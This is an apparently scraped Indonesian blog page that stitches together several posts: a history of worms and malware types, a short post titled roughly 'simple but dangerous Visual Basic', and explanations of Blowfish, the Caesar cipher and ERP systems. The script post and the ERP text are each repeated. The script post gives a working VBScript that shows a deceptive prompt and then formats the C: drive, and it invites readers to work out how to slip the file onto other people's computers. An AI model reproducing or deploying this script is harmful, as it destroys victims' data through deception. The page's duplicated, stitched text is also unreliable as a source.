Gagasan worm dan virus berawal pada tahun 1949, saat seorang founder Electronic Discrete Variable Automatic Computer (EDVAC), John Von Newman, memaparkan dalam sebuah papernya yang berjudul "Theory and Organization of Complicated Automata",
dibahas suatu kemungkinan bahwa suatu program dapat melakukan
penyebaran dengan sendirinya. Kemudian pada tahun 1960-an, para peneliti
AT&T Bell Laboratory membuat semacam permainan dengan menciptakan
suatu program yang dapat memusnahkan program ciptaan lawan, dan mampu
bertahan terhadap serangan program lawan lainnya. Pada akhirnya
si-pemenang adalah pemilik program yang tersisa paling banyak. Para
peneliti sadar akan bahaya program tersebut, maka setiap selesai
permainan program tersebut selalu dimusnahkan. Cikal bakal program worm
pertama kali dibuat oleh Bob Thomas
pada tahun 1971. Program ini merupakan solusi dari kebutuhan system
kendali lalu lintas udara. Program ini akan membantu mengingatkan
operator apabila pengendalian suatu pesawat udara berpindah dari satu
komputer ke komputer lainnya. Sesungguhnya program yang disebut
"creeper" ini hanya berpindah dari layar ke layar pada jaringan, dengan
menampilkan pesan "I’m creeper! Catch me if you can!". Tetapi program
creeper tidak mereproduksi dirinya sendiri, hingga beberapa programmer
lain
mencoba membuat program serupa, tetapi gagasan tersebut berangsur- angsur hilang dalam beberapa bulan kemudian. Istilah "virus" mungkin
sudah tidak asing terdengar, dapat dikatakan hampir setiap orang yang
mengenal komputer juga mengenal istilah ini, sementara istilah "worm"
tidak begitu dikenal, padahal istilah ini diciptakan oleh John Shoch dan
Jon Hupp di Xerox PARC (Palo Alto Research Centre) pada tahun 1979
sebelum istilah virus computer dipublikasikan. Istilah worm ini ternyata
diilhami oleh suatu program "tapeworm" (cacing pita) dalam sebuah novel
fiksi ilmiah karangan John Brunner yang berjudul "The Shockwave Rider",
yang mengisahkan suatu pemerintahan totaliter yang mengendalikan warga
negaranya melalui suatu jaringan komputer. Untuk memerangi hal itu
akhirnya seorang pahlawan dalam novel tersebut kemudian memenuhi
jaringan dengan suatu program yang disebut "tapeworm" sehingga memaksa
mematikan jaringan computer yang secara otomatis juga menghilangkan
kendali pemerintah terhadap warga negaranya. Kemudian diawal tahun 1980
John Shoch dan Jon Hupp mengadakan sebuah penelitian dengan
mengembangkan lima buah program worm, masing-masing worm dibuat dengan
tujuan tertentu yang membantu jaringan disekitarnya. Beberapa worm
terlihat sederhana, seperti worm "town crier" yang bertugas memasuki
jaringan hanya untuk menampilkan pengumuman. Worm lainnya terlihat lebih
kompleks dan pintar, seperti worm "vampire". Worm ini tidak akan
melakukan kegiatan pada siang harinya, tetapi saat malam hari worm akan
melakukan suatu kegiatan tertentu yang telah terprogram sebelumnya, ini
berguna untuk memanfaatkan computer yang tidak bekerja pada malam hari
dengan memberikan tugas yang kompleks dan memerlukan daya proses yang
lebih. Saat fajar, worm akan menghentikan pekerjaannya dengan terlebih
dahulu menyimpan seluruh pekerjaan yang dilakukannya malam itu dan
menunggu sore berikutnya. Walau bagaimanapun, walaupun program ini
berguna tapi disadari bahwa program ini juga akan sangat berbahaya
apabila salah digunakan. Hal ini terbukti saat sebuah worm mengalami
malfungsi pada suatu malam dan keesokan harinya para pekerja menemukan
seluruh komputer yang ada pada jaringan tersebut mengalami crash (suatu
kerusakan dimana system output dan input tidak berfungsi). Lebih dari
itu saat komputer dihidupkan kembali, worm malfungsi tersebut kembali
membuat komputer crash. Pada akhirnya dibuat semacam vaksin untuk
mencegah worm tersebut, dan mulai saat itu penelitian terhadap worm
tersebut ditutup untuk umum.
Istilah “VIRUS”
selalu digunakan sebagai suatu acuan umum untuk setiap malcode (program
atau script yang dibuat dengan tujuan membahayakan atau merugikan
sebuah system komputer), seperti worm,Trojan bahkan hoax yang
sesungguhnya bukan sebuah virus komputer, berikut adalah beberapa jenis
malcode tersebut:
->> Computer virus: merujuk
pada program yang memiliki kemampuan untuk ber- reproduksi, menulari
program lain dan menjadikan file-file program tertular sebagai file
infector.
->> Computer worm: merujuk
pada program independen yang memiliki kemampuan untuk ber-reproduksi,
menulari system komputer dan walaupun mampu untuk menulari program lain
namun tidak bertujuan untuk menjadikan file tertular tersebut sebagai
suatu file infector.
->> Trojan horse:
merujuk pada program independen yang tampaknya berguna, dan ketika
dieksekusi, tanpa sepengetahuan pengguna, juga melaksanakan
fungsi-fungsi yang bersifat destruktif dan merugikan.
->> Malicious toolkits: merujuk
pada program yang didesain untuk membantu menciptakan program-program
yang dapat membahayakan sebuah system komputer. Contoh dari program
jenis ini adalah tool pembuat virus dan program yang dibuat untuk
membantu proses cracking atau hacking.
Dari beberapa keterangan
diatas dapat diperjelas bahwa worm adalah suatu algoritma atau program
yang mereproduksi diri sendiri dari system ke system dengan menggunakan
media penyimpanan atau suatu jaringan। Worm tidak menginfeksi file
program lain dengan tujuan menjadikan file terinfeksi tersebut sebagai
file infector.
Monday, December 10, 2012
Visual Basic Sederhana Tapi berbahaya
Set WshShell = WScript.CreateObject("WScript.Shell")
X = MsgBox("Halo dunia bertanya siapkah anda mengganti operating system anda ?", vbYesNo, "Awas bahaya ngga tanggung jawab!")
If X = 6 Then
WshShell.Run("format.com /y C:")
End If
---------------------------------------------------------
itu kode VBS yang saya buat sangat simple dan saya rasa mudah untuk dimengerti kalangan umum kalau di jalankan maka akan memformat drive c: dengan indahnya Apa saja shell command?? cari pake GOGGLE.COM ! pokoknya idop google :P
Here sample command :
run.exe rundll user,#7
run.exe rundll user,#4
run.exe rundll user,#3
dan lain lain nah........
sekarang bagaimana caranya file ini bisa masuk ke komputer orang?? pikirkan sendiri bagaimana?
sumber
X = MsgBox("Halo dunia bertanya siapkah anda mengganti operating system anda ?", vbYesNo, "Awas bahaya ngga tanggung jawab!")
If X = 6 Then
WshShell.Run("format.com /y C:")
End If
---------------------------------------------------------
itu kode VBS yang saya buat sangat simple dan saya rasa mudah untuk dimengerti kalangan umum kalau di jalankan maka akan memformat drive c: dengan indahnya Apa saja shell command?? cari pake GOGGLE.COM ! pokoknya idop google :P
Here sample command :
run.exe rundll user,#7
run.exe rundll user,#4
run.exe rundll user,#3
dan lain lain nah........
sekarang bagaimana caranya file ini bisa masuk ke komputer orang?? pikirkan sendiri bagaimana?
sumber
- Sri Maryati Pratiwi
Enkripsi Blowfish
Blowfish alias “OpenPGP.Cipher.4″
merupakan enkripsi yang termasuk dalam golongan Symmetric Cryptosystem ,
metoda enkripsinya mirip dengan DES (DES-like Cipher) diciptakan oleh
seorang Cryptanalyst bernama Bruce Schneier Presiden perusahaan
Counterpane Internet Security, Inc (Perusahaan konsultan tentang
kriptografi dan keamanan Komputer) dan dipublikasikan tahun 1994. Dibuat
untuk digunakan pada komputer yang mempunyai microposesor besar (32-bit
keatas dengan cache data yang besar). Blowfish dikembangkan untuk
memenuhi kriteria desain yang cepat dalam implementasinya dimana pada
keadaan optimal dapat mencapai 26 clock cycle per byte, kompak dimana
dapat berjalan pada memori kurang dari 5 KB, sederhana dalam
algoritmanya sehingga mudah diketahui kesalahannya, dan keamanan yang
variabel dimana panjang kunci bervariasi (minimum 32 bit, maksimum 448
bit, Multiple 8 bit, default 128 bit).Blowfish dioptimasikan untuk
berbagai aplikasi dimana kunci tidak sering berubah, seperti pada
jaringan komunikasi atau enkripsi file secara otomatis. Dalam
pengimplementasiannya dalam komputer bermicroprosesor 32-bit dengan
cache data yang besar (Pentium dan Power PC) Blowfish terbukti jauh
lebih cepat dari DES. Tetapi Blowfish tidak cocok dengan aplikasi dengan
perubahan kunci yang sering atau sebagai fungsi hast satu arah seperti
pada aplikasi packet switching. Blowfish pun tidak dapat digunakan pada
aplikasi kartu pintar (smart card) karena memerlukan memori yang besar.
Blowfish termasuk dalam enkripsi block Cipher 64-bit dangan panjang
kunci yang bervariasi antara 32-bit sampai 448-bit.Algoritma Blowfish
terdiri atas dua bagian :
Key-Expansion
Berfungsi merubah kunci (Minimum 32-bit, Maksimum 448-bit) menjadi beberapa array subkunci (subkey) dengan total 4168 byte.
Enkripsi Data
Terdiri
dari iterasi fungsi sederhana (Feistel Network) sebanyak 16 kali
putaran. Setiap putaran terdiri dari permutasi kunci-dependent dan
substitusi kunci- dan data-dependent. Semua operasi adalah penambahan
(addition) dan XOR pada variabel 32-bit. Operasi tambahan lainnya
hanyalah empat penelusuran tabel (table lookup) array berindeks untuk
setiap putaran.
Algoritma Blowfish
Blowfish
menggunakan subkunci yang besar. Kunci tersebut harus dihitung sebelum
enkripsi atau dekripsi data. Blowfish adalah algoritma yang menerapkan
jaringan Feistel (Feistel Network) yang terdiri dari 16 putaran. Input
adalah elemen 64-bit,X.Untuk alur algoritma enkripsi dengan metoda
Blowfish dijelaskan sebagai berikut :
1. Bentuk inisial P-array sebanyak 18 buah (P1,P2,…………..P18) masing-msing bernilai 32-bit.
Array P terdiri dari delapan belas kunci 32-bit subkunci :
P1,P2,…….,P18
2. Bentuk S-box sebanyak 4 buah masing-masing bernilai 32-bit yang memiliki masukan 256.
Empat 32-bit S-box masing-masing mempunyai 256 entri :
S1,0,S1,1,………………..,S1,255
S2,0,S2,1,………………..,S2,255
S3,0,S3,1,………………..,S3,255
S4,0,S4,1,………………..,S4,255
3. Plaintext
yang akan dienkripsi diasumsikan sebagai masukan, Plaintext tersebut
diambil sebanyak 64-bit, dan apabila kurang dari 64-bit maka kita
tambahkan bitnya, supaya dalam operasi nanti sesuai dengan datanya.
4. Hasil pengambilan tadi dibagi 2, 32-bit pertama disebut XL, 32-bit yang kedua disebut XR.
5. Selanjutnya lakukan operasi XL = XL xor Pi dan XR = F(XL) xor XR
6. Hasil dari operrasi diatas ditukar XL menjadi XR dan XR menjadi XL.
7. Lakukan sebanyak 16 kali, perulangan yang ke-16 lakukan lagi proses penukaran XL dan XR.
8. Pada proses ke-17 lakukan operasi untuk XR = XR xor P17 dan XL = XL xor P18.
9. Proses terakhir satukan kembali XL dan XR sehingga menjadi 64-bit kembali.
Subkunci dihitung menggunakan algoritma Blowfish, metodanya adalah sebagai berikut :
- Pertama-tama inilialisasi P-array dan kemudian empat S-box secara berurutan dengan string yang tetap. String ini terdiri atas digit hexadesimal dari Pi.
- XOR P1 dengan 32-bit pertama kunci, XOR P2 dengan 32-bit kedua dari kunci dan seterusnya untuk setiap bit dari kunci (sampai P18).Ulangi terhadap bit kunci sampai seluruh P-array di XOR dengan bit kunci.
- Enkrip semua string nol dengan algoritma Blowfish dengan menggunakan subkunci seperti dijelaskan pada langkah (1) dan (2).
- Ganti P1 dan P2 dengan keluaran dari langkah (3).
- Enkrip keluaran dari langkah (3) dengan algoritma Blowfish dengan subkunci yang sudah dimodifikasi.
- Ganti P3 dan P4 dengan keluaran dari langkah (5).
- Lanjutkan proses tersebut, ganti seluruh elemen dari P-array, kemudian seluruh keempat S-box berurutan, dengan keluaran yang berubah secara kontiyu dari algoritma Blowfish.
Total
yang diperlukan adalah 521 iterasi untuk menghasilkan semua subkunci
yang dibutuhkan. Aplikasi kemudian dapat menyimpan subkunci ini dan
tidak membutuhkan langkah-langkah proses penurunan berulang kali,
kecuali kunci yang digunakan berubah.
Untuk
deskripsi sama persis dengan enkripsi, kecuali pada P-array
(P1,P2,……..,P18) digunakan dengan urutan terbalik atau di inverskan.
Keamanan Blowfish
Sampai
saat ini algoritma Blowfish belum ditemukan kelemahan yang berarti
hanya adanya weak key dimana dua entri dari S-box mempunyai nilai yang
sama. Belum ada cara untuk mengecek weak key sebelum melakukan key
expansion, tetapi hal ini tidak berpengaruh terhadap hasil enkripsi.
Hasil enkripsi dengan algoritma Blowfish sangat tidak mungkin dan tidak
praktis untuk di terjemahkan tanpa bantuan kunci. Sampai kini belum ada
Cryptanalysis yang dapat membongkar pesan tanpa kunci yang enkripsi oleh
Blowfish. Agar aman dari pembongkaran pesan maka dalam algoritmanya
harus menggunakan 16 putaran agar pesan tersebut tidak dapat dibongkar.
Algoritma Blowfish pun dapat digabungkan dengan algoritma-algoritma
enkripsi yang lain dalam pengkripsian sebuah pesan untuk lebih menjamin
isi dari pesan tersebut.
KRIPTOGRAFI CAESAR
Sebagai contoh, huruf A akan digeser 3 huruf menjadi huruf D, B akan digeser 3 huruf menjadi E, J akan digeser menjadi M, O akan menjadi R dan seterusnya. Pergeseran ini juga berputar kembali ke awal abjad sehingga sesudah huruf Z diikuti kembali oleh huruf A. Kriptografi Caesar ini dikenal sebagai monoalphabetic substitution cipher karena satu huruf tertentu pasti akan berubah menjadi huruf tertentu yang lain.
Perubahan pada kriptografi Caesar bisa dituliskan sebagai berikut:
Jika Caesar akan menuliskan kalimat ‘I LOVE YOU’ maka akan dituliskan dalam kalimat ‘L ORYH BRX.
Jika kita memberi nomor ke pada huruf-huruf abjad dan kita mulai dengan huruf A=0, B=1, C=2 dstnya sampai dengan Z=25, maka kriptografi Caesar memenuhi rumus sebagai berikut :
C = (P + 3) mod 26, di mana C adalah nomor abjad ciphertext, P adalah nomor abjad plaintext . Dan dekripsinya adalah P = (C – 3) mod 26.
Kripotogtafi Caesar ini kemudian berkembang di mana pergeseran tidak hanya 3 huruf tetapi ditentukan oleh suatu kunci yang adalah suatu huruf. Huruf ini yang menentukan pergeseran dari huruf pada plaintext. Jika kunci adalah A maka pergeseran adalah 0, B pergeseran adalah 1, C 2 dan seterusnya. Rumus di atas tetap berlaku tetapi pergeseran huruf ditentukan oleh nilai pergeseran k (lihat tabel 1) dan bisa berubah- ubah sesuai kunci yang digunakan.
Tabel pergeseran huruf pada kriptografi Caesar
Rumus kriptografi Caesar, secara umum bisa dituliskan sebagai berikut: C=E(P)= (P+k)mod26P=D(C)= (C-k)mod26 di manaPadalah plaintext,Cadalah ciphertext,kadalah pergeseran huruf sesuai dengan kunci yang dikehendaki. Dibawah ini adalah tampilan implementasi kriptografi Caesar dalam Visual Basic.Net. Masukkan kalimat yang ingin dienkripsi, dan masukkan kunci yang dikehendaki, misalnya kalimat: INI PESAN RAHASIA dengan kunci L. Klik tombol Encipher dan lihat ciphertext yang muncul.
ERP adalah....
ERP adalah sistem informasi yang diperuntukkan bagi perusahan manufaktur
maupun jasa yang berperan mengintegrasikan dan mengotomasikan proses
bisnis yang berhubungan dengan aspek operasi, produksi maupun distribusi
di perusahaan bersangkutan. Atau dengan kata lain ERP digunakan untuk
mengelola seluruh aktifitas perusahaan termasuk keuangan, produksi, HRD,
marketing, supply chain, logistics, dll. SAP adalah perusahaan yang
memiliki pangsa pasar (marketshare) terbesar di dunia untuk software
ERP.
Karakter Sistem ERP sering disebut sebagai Back Office System yang mengindikasikan bahwa pelanggan dan publik secara umum tidak dilibatkan dalam sistem ini. Berbeda dengan Front Office System yang langsung berurusan dengan pelanggan seperti sistem untuk e-Commerce , Customer Relationship Management (CRM), e-Government dan lain-lain.
ERP sering disebut sebagai Back Office System yang mengindikasikan bahwa pelanggan dan publik secara umum tidak dilibatkan dalam sistem ini. Berbeda dengan Front Office Syistem ,yang langsung berurusan dengan pelanggan seperti sistem untuk e-Commerce , Customer Relationship Management (CRM), e-Government dan lain-lain. Konsep ERP dapat dijalankan dengan baik,jika didukung aplikasi dan infrastruktur komputer baik Hardware / software sehingga pengolahan dapat dilakukan dengan mudah .
ERP berkembang dari Manufacturing Resource Planning ( MRP II) dimana MRP II sendiri adalah hasil evolusi dari Material Requirement Planning (MRP) yang berkembang sebelumnya. Sistem ERP secara modular biasanya menangani proses manufaktur, logistik, distribusi, persediaan (inventory), pengapalan, invoice dan akuntasi perusahaan. Ini berarti bahwa sistem ini nanti akan membantu mengontrol aktivitas bisnis seperti penjualan, pengiriman, produksi, manajemen persediaan, manajemen kualitas dan sumber daya manusia.
Sistim ERP dibagi atas beberapa sub-sistim yaitu sistim Financial, sistim Distribusi, sistim Manufaktur, sistim Maintenance dan sistim Human Resource. Industri analis TI seperti Gartner Group dan AMR Research telah sejak awal tahun 90an memantau dan menganalisa paket-paket aplikasi yang tergolong dalam sistim ERP. Contoh paket ERP antara lain: SAP, Baan, Oracle, IFS, Peoplesoft dan JD.Edwards.
Untuk mengetahui bagaimana sistim ERP dapat membantu sistim operasi bisnis kita, mari kita perhatikan suatu kasus kecil seperti di bawah ini :
Katakanlah kita menerima order untuk 100 unit Produk A. Sistim ERP akan membantu kita menghitung berapa yang dapat diproduksi berdasarkan segala keterbatasan sumber daya yang ada pada kita saat ini. Apabila sumber daya tersebut tidak mencukupi, sistim ERP dapat menghitung berapa lagi sumberdaya yang diperlukan, sekaligus membantu kita dalam proses pengadaannya. Ketika hendak mendistribusikan hasil produksi, sistim ERP juga dapat menentukan cara pemuatan dan pengangkutan yang optimal kepada tujuan yang ditentukan pelanggan. Dalam proses ini, tentunya segala aspek yang berhubungan dengan keuangan akan tercatat dalam sistim ERP tersebut termasuk menghitung berapa biaya produksi dari 100 unit tersebut.
Beberapa keuntungan penggunaan ERP :
Integrasi data keuangan
Untuk mengintegrasikan data keuangan sehingga top management bisa melihat dan mengontrol kinerja keuangan perusahaan dengan lebih baik
Standarisasi Proses Operasi
Menstandarkan proses operasi melalui implementasi best practice sehingga terjadi peningkatan produktivitas, penurunan inefisiensi dan peningkatan kualitas produk
Standarisasi Data dan Informasi
Menstandarkan data dan informasi melalui keseragaman pelaporan, terutama untuk perusahaan besar yang biasanya terdiri dari banyak business unit dengan jumlah dan jenis bisnis yg berbeda-beda
Suksesor Penerapan
Syarat sukses memilih ERP Pengetahuan dan Pengalaman Pengetahuan adalah pengetahuan tentang bagaimana cara sebuah proses seharusnya dilakukan, jika segala sesuatunya berjalan lancar Pengalaman adalah pemahaman terhadap kenyataan tentang bagaimana sebuah proses seharusnya dikerjakan dengan kemungkinan munculnya permasalahan. Pengetahuan tanpa pengalaman menyebabkan orang membuat perencanaan yang terlihat sempurna tetapi kemudian terbukti tidak bisa diimplementasikan. Pengalaman tanpa pengetahuan bisa menyebabkan terulangnya atau terakumulasinya kesalahan dan kekeliruan karena tidak dibekali dengan pemahaman yg cukup.
Penerapan ERP
Berikut ini adalah ringkasan poin-poin yg bisa digunakan sebagai pedoman pada saat implementasi ERP:
• ERP adalah bagian dari infrastruktur perusahaan, dan sangat penting untuk kelangsungan hidup perusahaan.
• Semua orang dan bagian yang akan terpengaruh oleh adanya ERP harus terlibat dan memberikan dukungan ERP ada untuk mendukung fungsi bisnis dan meningkatkan produktivitas, bukan sebaliknya.
• Tujuan implementasi ERP adalah untuk meningkatkan daya saing perusahaan Pelajari kesuksesan dan kegagalan implementasi ERP, jangan berusaha membuat sendiri praktek implementasi ERP.
• Ada metodologi tertentu untuk implementasi ERP yang lebih terjamin keberhasilannya.
• Gagalnya ERP :
- Waktu dan biaya implementasi yang melebihi anggaran Pre-implementation tidak dilakukan dengan baik
- Strategi operasi tidak sejalan dengan business process design dan pengembangannya
- Orang-orang tidak disiapkan untuk menerima dan beroperasi dengan sistem yang baru
Karakter Sistem ERP sering disebut sebagai Back Office System yang mengindikasikan bahwa pelanggan dan publik secara umum tidak dilibatkan dalam sistem ini. Berbeda dengan Front Office System yang langsung berurusan dengan pelanggan seperti sistem untuk e-Commerce , Customer Relationship Management (CRM), e-Government dan lain-lain.
ERP sering disebut sebagai Back Office System yang mengindikasikan bahwa pelanggan dan publik secara umum tidak dilibatkan dalam sistem ini. Berbeda dengan Front Office Syistem ,yang langsung berurusan dengan pelanggan seperti sistem untuk e-Commerce , Customer Relationship Management (CRM), e-Government dan lain-lain. Konsep ERP dapat dijalankan dengan baik,jika didukung aplikasi dan infrastruktur komputer baik Hardware / software sehingga pengolahan dapat dilakukan dengan mudah .
ERP berkembang dari Manufacturing Resource Planning ( MRP II) dimana MRP II sendiri adalah hasil evolusi dari Material Requirement Planning (MRP) yang berkembang sebelumnya. Sistem ERP secara modular biasanya menangani proses manufaktur, logistik, distribusi, persediaan (inventory), pengapalan, invoice dan akuntasi perusahaan. Ini berarti bahwa sistem ini nanti akan membantu mengontrol aktivitas bisnis seperti penjualan, pengiriman, produksi, manajemen persediaan, manajemen kualitas dan sumber daya manusia.
Sistim ERP dibagi atas beberapa sub-sistim yaitu sistim Financial, sistim Distribusi, sistim Manufaktur, sistim Maintenance dan sistim Human Resource. Industri analis TI seperti Gartner Group dan AMR Research telah sejak awal tahun 90an memantau dan menganalisa paket-paket aplikasi yang tergolong dalam sistim ERP. Contoh paket ERP antara lain: SAP, Baan, Oracle, IFS, Peoplesoft dan JD.Edwards.
Untuk mengetahui bagaimana sistim ERP dapat membantu sistim operasi bisnis kita, mari kita perhatikan suatu kasus kecil seperti di bawah ini :
Katakanlah kita menerima order untuk 100 unit Produk A. Sistim ERP akan membantu kita menghitung berapa yang dapat diproduksi berdasarkan segala keterbatasan sumber daya yang ada pada kita saat ini. Apabila sumber daya tersebut tidak mencukupi, sistim ERP dapat menghitung berapa lagi sumberdaya yang diperlukan, sekaligus membantu kita dalam proses pengadaannya. Ketika hendak mendistribusikan hasil produksi, sistim ERP juga dapat menentukan cara pemuatan dan pengangkutan yang optimal kepada tujuan yang ditentukan pelanggan. Dalam proses ini, tentunya segala aspek yang berhubungan dengan keuangan akan tercatat dalam sistim ERP tersebut termasuk menghitung berapa biaya produksi dari 100 unit tersebut.
Beberapa keuntungan penggunaan ERP :
Integrasi data keuangan
Untuk mengintegrasikan data keuangan sehingga top management bisa melihat dan mengontrol kinerja keuangan perusahaan dengan lebih baik
Standarisasi Proses Operasi
Menstandarkan proses operasi melalui implementasi best practice sehingga terjadi peningkatan produktivitas, penurunan inefisiensi dan peningkatan kualitas produk
Standarisasi Data dan Informasi
Menstandarkan data dan informasi melalui keseragaman pelaporan, terutama untuk perusahaan besar yang biasanya terdiri dari banyak business unit dengan jumlah dan jenis bisnis yg berbeda-beda
Suksesor Penerapan
Syarat sukses memilih ERP Pengetahuan dan Pengalaman Pengetahuan adalah pengetahuan tentang bagaimana cara sebuah proses seharusnya dilakukan, jika segala sesuatunya berjalan lancar Pengalaman adalah pemahaman terhadap kenyataan tentang bagaimana sebuah proses seharusnya dikerjakan dengan kemungkinan munculnya permasalahan. Pengetahuan tanpa pengalaman menyebabkan orang membuat perencanaan yang terlihat sempurna tetapi kemudian terbukti tidak bisa diimplementasikan. Pengalaman tanpa pengetahuan bisa menyebabkan terulangnya atau terakumulasinya kesalahan dan kekeliruan karena tidak dibekali dengan pemahaman yg cukup.
Penerapan ERP
Berikut ini adalah ringkasan poin-poin yg bisa digunakan sebagai pedoman pada saat implementasi ERP:
• ERP adalah bagian dari infrastruktur perusahaan, dan sangat penting untuk kelangsungan hidup perusahaan.
• Semua orang dan bagian yang akan terpengaruh oleh adanya ERP harus terlibat dan memberikan dukungan ERP ada untuk mendukung fungsi bisnis dan meningkatkan produktivitas, bukan sebaliknya.
• Tujuan implementasi ERP adalah untuk meningkatkan daya saing perusahaan Pelajari kesuksesan dan kegagalan implementasi ERP, jangan berusaha membuat sendiri praktek implementasi ERP.
• Ada metodologi tertentu untuk implementasi ERP yang lebih terjamin keberhasilannya.
• Gagalnya ERP :
- Waktu dan biaya implementasi yang melebihi anggaran Pre-implementation tidak dilakukan dengan baik
- Strategi operasi tidak sejalan dengan business process design dan pengembangannya
- Orang-orang tidak disiapkan untuk menerima dan beroperasi dengan sistem yang baru
Subscribe to:
Posts (Atom)